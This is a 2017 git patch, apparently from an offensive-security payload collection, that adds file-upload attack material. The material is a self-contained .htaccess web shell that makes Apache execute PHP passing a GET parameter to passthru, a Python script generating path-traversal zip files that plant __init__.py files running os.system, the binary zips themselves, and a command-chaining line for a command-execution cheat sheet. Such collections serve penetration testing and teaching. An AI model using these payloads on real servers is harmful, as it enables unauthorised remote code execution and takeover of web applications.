From a2d5fe5cad9ca50614d588924431fbe7d1a6ef5b Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Mon, 9 Oct 2017 23:17:31 +0200
Subject: [PATCH] Upload .htaccess to PHP code exec

---
 Remote commands execution/README.md           |   1 +
 Upload insecure files/PHP .htaccess/.htaccess |  14 +++++++++
 Upload insecure files/PHP .htaccess/README.md |  27 ++++++++++++++++++
 .../python-admin-__init__.py.zip              | Bin 0 -> 178 bytes
 .../python-conf-__init__.py.zip               | Bin 0 -> 176 bytes
 .../python-config-__init__.py.zip             | Bin 0 -> 180 bytes
 .../python-controllers-__init__.py.zip        | Bin 0 -> 190 bytes
 .../python-generate-init.py                   |  19 ++++++++++++
 .../python-login-__init__.py.zip              | Bin 0 -> 178 bytes
 .../python-models-__init__.py.zip             | Bin 0 -> 180 bytes
 .../python-modules-__init__.py.zip            | Bin 0 -> 182 bytes
 .../python-scripts-__init__.py.zip            | Bin 0 -> 182 bytes
 .../python-settings-__init__.py.zip           | Bin 0 -> 184 bytes
 .../python-tests-__init__.py.zip              | Bin 0 -> 178 bytes
 .../python-urls-__init__.py.zip               | Bin 0 -> 176 bytes
 .../python-utils-__init__.py.zip              | Bin 0 -> 178 bytes
 .../python-view-__init__.py.zip               | Bin 0 -> 176 bytes
 17 files changed, 61 insertions(+)
 create mode 100644 Upload insecure files/PHP .htaccess/.htaccess
 create mode 100644 Upload insecure files/PHP .htaccess/README.md
 create mode 100644 Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-conf-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-config-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-generate-init.py
 create mode 100644 Upload insecure files/Python __init__.py/python-login-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-models-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-modules-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-settings-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-tests-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-urls-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-utils-__init__.py.zip
 create mode 100644 Upload insecure files/Python __init__.py/python-view-__init__.py.zip

diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 8a68054..3ffd7b1 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -17,6 +17,7 @@ Commands execution by chaining commands
 original_cmd_by_server; ls
 original_cmd_by_server && ls
 original_cmd_by_server | ls
+original_cmd_by_server || ls    Only if the first cmd fail
 ```
 
 Commands execution inside a command
diff --git a/Upload insecure files/PHP .htaccess/.htaccess b/Upload insecure files/PHP .htaccess/.htaccess
new file mode 100644
index 0000000..9abc36b
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/.htaccess	
@@ -0,0 +1,14 @@
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+<Files ~ "^\.ht">
+Order allow,deny
+Allow from all
+</Files>
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md
new file mode 100644
index 0000000..719aff3
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/README.md	
@@ -0,0 +1,27 @@
+# .htaccess upload
+Uploading an .htaccess file to override Apache rule and execute PHP.
+"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
+
+
+Self contained .htaccess web shell
+```
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+<Files ~ "^\.ht">
+Order allow,deny
+Allow from all
+</Files>
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
+```
+
+
+## Thanks to
+* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
diff --git a/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip b/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..69f89c52165beca1df9a6b52b2256214db45c4f8
GIT binary patch
literal 178
zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF=_jV-X6EU~$7kkcmc+;F6;x*C7UUO|DC8Gg
z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al
QY#=#CAanxKQ6LTj03YflJOBUy

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip b/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..4eef395abb72d006d681b859d4afae2eb14f5d19
GIT binary patch
literal 176
zcmWIWW@Zs#fB;2?hfB)UHGmut76xKHJ^keTyfppz_{_Y_lK6PNg38R?g8ZTqh5Tac
zf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+(tvJWMKHu2x4KeD8QSQ
Q4J5?~gpNQu62xHu0JiQVasU7T

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-config-__init__.py.zip b/Upload insecure files/Python __init__.py/python-config-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..61e0f11db4ea7d04978bf5511d94cd9b81ac93a3
GIT binary patch
literal 180
zcmWIWW@Zs#fB;2?hfB)UHGmut76oEGJ^keTytK@8{rLFIyv&mLc)fzk%-n+fq7sGt
zV(WsU%)Al>_27)uoE&xQ{9?W0%HopLTn+V{Vs%aH0B=Sn5oX+mLo8)r_|FJpVYMp2
So0SbD$q0nbKsp-4VE_P;|0Ws$

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip b/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..7e7f015888cf3385e9c64be7f5584a00b2d549d4
GIT binary patch
literal 190
zcmWIWW@Zs#fB;2?hfB)UHGmutmI7iuJ^keTypp2)oSf96V*U8|%)HE!_;|g7%FNt?
z{Gt+t{9@~ZqRhM!1@+*J)SMi3>-=K9;>zNZ)LaeqoMLrN>i};?CJ|=bHb87<VEE4n
XV&S$gz?+o~q=FF$J%Drqh{FH?{Jbi#

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-generate-init.py b/Upload insecure files/Python __init__.py/python-generate-init.py
new file mode 100644
index 0000000..d1efac0
--- /dev/null
+++ b/Upload insecure files/Python __init__.py/python-generate-init.py	
@@ -0,0 +1,19 @@
+# Generating "evil" zip file
+# Based on the work of Ajin Abraham
+# Vuln website : https://github.com/ajinabraham/bad_python_extract
+# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
+
+# Warning 1: need a restart from the server OR debug=True
+# Warning 2: you won't get the output of the command (blind rce)
+import zipfile
+
+directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
+for d in directories:
+    name = "python-"+d+"-__init__.py.zip"
+    zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
+    zipf.close()
+    z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
+    z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
+    z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
+    z_info.external_attr = 0777 << 16L
+    z_file.close()
diff --git a/Upload insecure files/Python __init__.py/python-login-__init__.py.zip b/Upload insecure files/Python __init__.py/python-login-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..5f6703676bf75675025e474f9bf5daa736120e4a
GIT binary patch
literal 178
zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF>F4C9XXfe0$7kkcmc+;F6;x*C7UUO|DC8Gg
z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al
QY#=#CAanxKQ6LTj04r=ITmS$7

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-models-__init__.py.zip b/Upload insecure files/Python __init__.py/python-models-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..75c2e0f63ce5345966252fbc28f1f1713fb7dd96
GIT binary patch
literal 180
zcmWIWW@Zs#fB;2?hfB)UHGmut76oEGJ^kGLl+>JJ{rLFIyv&mLc)fzk%-n+fq7sGt
zV(WsU%)Al>_27)uoE&xQ{9?W0%HopLTn+V{Vs%aH0B=Sn5oX+mLo8)r_|FJpVYMp2
So0SbD$q0nbKsp-4VE_P|*CsXq

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip b/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..47e5e5e8ce43b56753f811bccb07ec10ad7b0d2c
GIT binary patch
literal 182
zcmWIWW@Zs#fB;2?hfB)UHGmut76W2EJ^kGLl+v8kV*U8|%)HE!_;|g7%FNt?{Gt+t
z{9@~ZqRhM!1@+*J)SMi3>-=K9;>zNZ)LaeqoMLrN>i};?CJ|=brbBFHVEE4nVqv!{
Tz?+o~B+CedE<id4#9;sc6;~%D

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip b/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..a2bbe3b30360b0c24fa1ea9af309c8c77218855f
GIT binary patch
literal 182
zcmWIWW@Zs#fB;2?hfB)UHGmut76W2EJ^kY3qRfJlV*U8|%)HE!_;|g7%FNt?{Gt+t
z{9@~ZqRhM!1@+*J)SMi3>-=K9;>zNZ)LaeqoMLrN>i};?CJ|=brbBFHVEE4nVqv!{
Tz?+o~B+CedE<id4#9;scAL}PV

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip b/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..4ea8d0636ea4c34c61fc3ec7542ad9c65c7b1130
GIT binary patch
literal 184
zcmWIWW@Zs#fB;2?hfB)UHGmut76)QIJ^kX;l9J54^kV(^_{_Y_lK6PNg38R?g8ZTq
zh5Tacf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+{Qz!WnlQv2x8%|
UEWn$U4J6G7gswn37Q|ry0Fvb>7ytkO

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip b/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..ebca36969e191e2eeeac8951c726056c8df54d47
GIT binary patch
literal 178
zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF>6fGymlW&A$7kkcmc+;F6;x*C7UUO|DC8Gg
z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al
QY#=#CAanxKQ6LTj06mr^kN^Mx

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip b/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..13b89edfba49e95397996d4a14601aef9ea7a68f
GIT binary patch
literal 176
zcmWIWW@Zs#fB;2?hfB)UHGmut76xKHJ^j+6oMQd>_{_Y_lK6PNg38R?g8ZTqh5Tac
zf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+(tvJWMKHu2x4KeD8QSQ
Q4J5?~gpNQu62xHu0L?-qvH$=8

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip b/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..3622020e876f48c5fb42d80bde67f904bfcf8a62
GIT binary patch
literal 178
zcmWIWW@Zs#fB;2?hfB)UHGmut28rtF>6eyd<`nD4$7kkcmc+;F6;x*C7UUO|DC8Gg
z7ZhdYl_;nOXQbxjs9Wb3>lIfPm!#%usOJ=`Ygz|*Gct)V<2D;&Cj-NOMi2{|O#$Al
QY#=#CAanxKQ6LTj06btNi~s-t

literal 0
HcmV?d00001

diff --git a/Upload insecure files/Python __init__.py/python-view-__init__.py.zip b/Upload insecure files/Python __init__.py/python-view-__init__.py.zip
new file mode 100644
index 0000000000000000000000000000000000000000..29ed3a0ea0b8b67e8b34ef4ce67883bbc1a9dde9
GIT binary patch
literal 176
zcmWIWW@Zs#fB;2?hfB)UHGmut76xKHJ^ixG)N=j!_{_Y_lK6PNg38R?g8ZTqh5Tac
zf}+g45(V|(jMSVQb?f|Mz2eH^lGI!c^_*gLP3r(}MkWzv+(tvJWMKHu2x4KeD8QSQ
Q4J5?~gpNQu62xHu0L76coB#j-

literal 0
HcmV?d00001